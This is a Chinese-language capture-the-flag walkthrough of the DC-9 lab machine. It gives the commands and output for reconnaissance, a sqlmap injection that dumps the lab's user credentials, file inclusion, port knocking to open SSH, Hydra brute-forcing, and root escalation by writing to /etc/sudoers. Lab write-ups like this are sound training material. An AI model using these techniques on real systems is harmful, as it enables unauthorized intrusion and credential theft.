DC-9靶机渗透详细流程

信息收集:

1.存活扫描:

arp-scan -I eth0 -l

发现靶机ip:192.168.10.132

└─# arp-scan -I eth0 -l
192.168.10.1    00:50:56:c0:00:08       (Unknown)
192.168.10.2    00:50:56:e5:b1:08       (Unknown)
192.168.10.132 //靶机 00:0c:29:a6:a5:cd       (Unknown)
192.168.10.254  00:50:56:fd:0f:18       (Unknown)

2.端口扫描:

nmap -sS -p- 192.168.10.132

└─# nmap -sS -p- 192.168.10.132
PORT   STATE    SERVICE
22/tcp filtered ssh //这个端口应该是被关闭了
80/tcp open     http
MAC Address: 00:0C:29:A6:A5:CD (VMware)

3.服务扫描:

nmap -sS -p 80,22 -sCV -O --version-all 192.168.10.132

└─# nmap -sS -p 80,22 -sCV -O --version-all 192.168.10.132
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:A6:A5:CD (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

Web部分:

这个界面是真的像 drupal ,,这里提示我们在菜单上选择几个功能玩玩。

DC-9靶机渗透详细流程_第1张图片

这里是展示所有的用户,,

DC-9靶机渗透详细流程_第2张图片

这里是查找用户,可能有sql的查询语句,,这里可能存在SQL注入,我们开启bp看一下。

DC-9靶机渗透详细流程_第3张图片

果然是存在SQL注入的,这里用 时间注入 的方法,放包后,页面确实延迟了5秒才显示。

DC-9靶机渗透详细流程_第4张图片

SQL注入:

那我们这里直接sqlmap一把梭。

└─# vim web.txt   
                                                                                             
┌──(root㉿kali)-[/home/kali/Desktop/DC-9]
└─# cat web.txt   
POST /results.php HTTP/1.1
Host: 192.168.10.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://192.168.10.132
Connection: close
Referer: http://192.168.10.132/search.php
Cookie: PHPSESSID=2qd0b9ffsinjs8vsnnffcla2dm
Upgrade-Insecure-Requests: 1

search=Mary

└─# sqlmap -r web.txt --batch --level 5 --dbs
available databases [3]:
[*] information_schema
[*] Staff
[*] users

DC-9靶机渗透详细流程_第5张图片

这里整理一下得到的信息,,

available databases [3]:
[*] information_schema
[*] Staff
[*] users
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+
Table: Users
[3 columns]
+----------+-----------------+
| Column   | Type            |
+----------+-----------------+
| Password | varchar(255)    |
| UserID   | int(6) unsigned |
| Username | varchar(255)    |
+----------+-----------------+
Table: Users
[1 entry]
admin/transorbital1
+--------+----------------------------------+----------+
| UserID | Password                         | Username |
+--------+----------------------------------+----------+
| 1      | 856f5de590ef37314e7c3bdf6f8a66dc | admin    |
+--------+----------------------------------+----------+
---------------------------------------------------
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname   | password      | reg_date            | username  | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1  | Moe        | 3kfs86sfd     | 2019-12-29 16:58:26 | marym     | Mary      |
| 2  | Dooley     | 468sfdfsd2    | 2019-12-29 16:58:26 | julied    | Julie     |
| 3  | Flintstone | 4sfd87sfd1    | 2019-12-29 16:58:26 | fredf     | Fred      |
| 4  | Rubble     | RocksOff      | 2019-12-29 16:58:26 | barneyr   | Barney    |
| 5  | Cat        | TC&TheBoyz    | 2019-12-29 16:58:26 | tomc      | Tom       |
| 6  | Mouse      | B8m#48sd      | 2019-12-29 16:58:26 | jerrym    | Jerry     |
| 7  | Flintstone | Pebbles       | 2019-12-29 16:58:26 | wilmaf    | Wilma     |
| 8  | Rubble     | BamBam01      | 2019-12-29 16:58:26 | bettyr    | Betty     |
| 9  | Bing       | UrAG0D!       | 2019-12-29 16:58:26 | chandlerb | Chandler  |
| 10 | Tribbiani  | Passw0rd      | 2019-12-29 16:58:26 | joeyt     | Joey      |
| 11 | Green      | yN72#dsd      | 2019-12-29 16:58:26 | rachelg   | Rachel    |
| 12 | Geller     | ILoveRachel   | 2019-12-29 16:58:26 | rossg     | Ross      |
| 13 | Geller     | 3248dsds7s    | 2019-12-29 16:58:26 | monicag   | Monica    |
| 14 | Buffay     | smellycats    | 2019-12-29 16:58:26 | phoebeb   | Phoebe    |
| 15 | McScoots   | YR3BVxxxw87   | 2019-12-29 16:58:26 | scoots    | Scooter   |
| 16 | Trump      | Ilovepeepee   | 2019-12-29 16:58:26 | janitor   | Donald    |
| 17 | Morrison   | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2  | Scott     |
+----+------------+---------------+---------------------+-----------+-----------+

我们把得到的所有信息存到字典里面,,以防要用。

DC-9靶机渗透详细流程_第6张图片

文件包含:

我们先把在 Staff 得到的账密去登录后台看看,,这里说文件没有找到,我们考虑是文件做了变量,可能含有 文件包含 漏洞。

DC-9靶机渗透详细流程_第7张图片

确实发现了文件包含漏洞 我们去跑跑配置文件看看有没有信息。

DC-9靶机渗透详细流程_第8张图片

DC-9靶机渗透详细流程_第9张图片

这里发现了几个关键的配置文件,, knock.conf

靶机是用 kncok 去隐藏了端口,我们需要用对应的端口去敲门,敲门结束后对应关闭的端口就会开放。这也是一种系统加固的方法。

这里查看配置文件,开门的端口分别是:7469,8475,9842

DC-9靶机渗透详细流程_第10张图片

Knock敲门开放SSH:

这里我们是有很多办法的,,可以安装knock工具敲门,也可以用 nmap nc 去碰撞敲门,我们这里采用nmap分别对3个端口探测即可。

nmap -sS -p 7469,8475,9842 192.168.10.132

DC-9靶机渗透详细流程_第11张图片

Hydra爆破SSH:

ok 破解出来了3个账密:

hydra -L users.list -P pass.list ssh://192.168.10.132

login: chandlerb   password: UrAG0D!
login: joeyt       password: Passw0rd
login: janitor     password: Ilovepeepee

DC-9靶机渗透详细流程_第12张图片

在janitor用户发现个密码本,,写到我们的字典上二次爆破,,发现新用户。

login: fredf password: B4-Tru3-00

DC-9靶机渗透详细流程_第13张图片

切换到新发现的用户,,sudo -l 发现可以用 root 权限执行 test 文件。执行发现该文件是用python写的,查找一下test.py文件的路径,查看内容,,发现是将参数1的内容写到参数2里面去。

fredf@dc-9:~$ cat /opt/devstuff/test.py 
#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

DC-9靶机渗透详细流程_第14张图片

这里其实有比较多的办法,可以利用计划任务提权,写进 /etc/passwd 里面提权,也可以写进sudoers组里面。

我们这里把 fredf 用户写进 sudoers 里面得到 ALL 权限,简单一点。

echo "fredf ALL=(ALL) ALL" > fredf
sudo /opt/devstuff/dist/test/test ~/fredf /etc/sudoers
sudo -l
-------------------------------------------
fredf@dc-9:~$ echo "fredf ALL=(ALL) ALL" > fredf
fredf@dc-9:~$ ls
fredf
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test ~/fredf /etc/sudoers
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test
    (ALL) ALL
fredf@dc-9:~$ sudo su root
[sudo] password for fredf: 
root@dc-9:/home/fredf# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-9:/home/fredf# cat /etc/sudoers
#
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#
Defaults   env_reset
Defaults   mail_badpass
Defaults   secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

# Host alias specification

# User alias specification

# Cmnd alias specification

# User privilege specification
root  ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL

# See sudoers(5) for more information on "#include" directives:

#includedir /etc/sudoers.d

fredf ALL=(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf ALL=(ALL) ALL
root@dc-9:/home/fredf# find / -name *flag.txt
/root/theflag.txt
root@dc-9:/home/fredf# cat /root/theflag.txt


███╗   ██╗██╗ ██████╗███████╗    ██╗    ██╗ ██████╗ ██████╗ ██╗  ██╗██╗██╗██╗
████╗  ██║██║██╔════╝██╔════╝    ██║    ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║     █████╗      ██║ █╗ ██║██║   ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║     ██╔══╝      ██║███╗██║██║   ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗    ╚███╔███╔╝╚██████╔╝██║  ██║██║  ██╗██╗██╗██╗
╚═╝  ╚═══╝╚═╝ ╚═════╝╚══════╝     ╚══╝╚══╝  ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝╚═╝
                                                                             
Congratulations - you have done well to get to this point.

Hope you enjoyed DC-9.  Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.

I also want to send out a big thank you to the various members of @m0tl3ycr3w .

They are an inspirational bunch of fellows.

Sure, they might smell a bit, but...just kidding.  :-)

Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.

So long, and thanks for all the fish.

你可能感兴趣的:(DC靶机系列渗透测试,网络安全,web安全,web,网络,安全,安全攻防)